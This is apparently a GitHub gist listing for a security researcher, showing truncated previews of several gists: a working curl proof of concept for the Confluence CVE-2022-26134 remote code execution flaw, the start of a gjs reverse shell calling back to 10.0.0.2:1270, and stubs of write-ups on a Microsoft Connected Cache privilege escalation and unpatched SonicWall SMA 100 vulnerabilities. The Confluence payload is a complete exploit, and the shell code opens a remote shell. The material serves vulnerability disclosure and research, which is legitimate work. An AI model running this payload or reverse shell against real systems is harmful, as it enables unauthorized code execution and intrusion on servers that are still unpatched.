Jake Baines jbaines-r7

@jbaines-r7
jbaines-r7 / cve_2022_26134_curl.md
Created June 6, 2022 18:06
Confluence CVE-2022-26134 Curl PoC

The following curl proof of concept returns the output of a command executed on Confluence 7.18.0 and below. The command below runs whoami and stores its output in the X-Cmd-Response header of the HTTP response.

curl -v http://10.0.0.247:8090/%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Cmd-Response%22%2CClass.forName%28%22javax.script.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20d%3D%27%27%3Bvar%20i%20%3D%20java.lang.Runtime.getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%3B%20while%28i.available%28%29%29d%2B%3DString.fromCharCode%28i.read%28%29%29%3Bd%22%29%29%7D/

Example:

albinolobster@ubuntu:~$ curl -v http://10.0.0.28:8090/%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Cmd-Response%22%2CClass.forName%28%22javax.script.Script
@jbaines-r7
jbaines-r7 / shell.js
Last active June 6, 2022 23:37
gjs Reverse Shell
// gjs shell.js
const Gio = imports.gi.Gio;
const GLib = imports.gi.GLib;
try {
let connection = (new Gio.SocketClient()).connect_to_host("10.0.0.2:1270", null, null);
let output = connection.get_output_stream();
let input = new Gio.DataInputStream({ base_stream: connection.get_input_stream() });
@jbaines-r7
jbaines-r7 / ms_cc_lpe.md
Last active April 25, 2022 00:10
Microsoft Connected Cache LPE

Microsoft Connected Cache Local Privilege Escalation

Summary

Tested Versions

  • Endpoint Configuration Manager version: 2103
  • Site version: 5.00.9049.1000
  • Connected Cache version: 1.5.4.1512 (?)
  • Site installed on Windows Server 2019 (10.0.17763.2366)
@jbaines-r7
jbaines-r7 / sonicwall_sma_100_0_day.md
Last active May 4, 2022 14:05
Sonicwall SMA 100 Series 0-day

The following issues are unpatched vulnerabilities in SonicWall's SMA 100 Series. Testing was done using SMA 500v using firmware versions 9.0.0.11-31sv and 10.2.1.1-19sv. Because these two versions are substantially different under the hood, not all of the issues affect both versions. As such, for each issue I'll call out specifically which versions are affected. Note that no testing was done on the 10.2.0.x version line.

Summary

Vector | Auth            | Affected Version | Component    | Vulnerability               | CVSS Vector
Remote | Unauthenticated | 10.2.1.1-19sv    | httpd        | Stack-based buffer overflow | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Remote | Authenticated   | Both             | Multiple cgi | Command injection           | AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Remote | Unauthenticated | 10.2.1.1-19sv    | sonicfiles   | File upload path traversal  | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
Remote | Unauthenticated | Both             | sonicfiles   | CPU exhaustion              | AV:N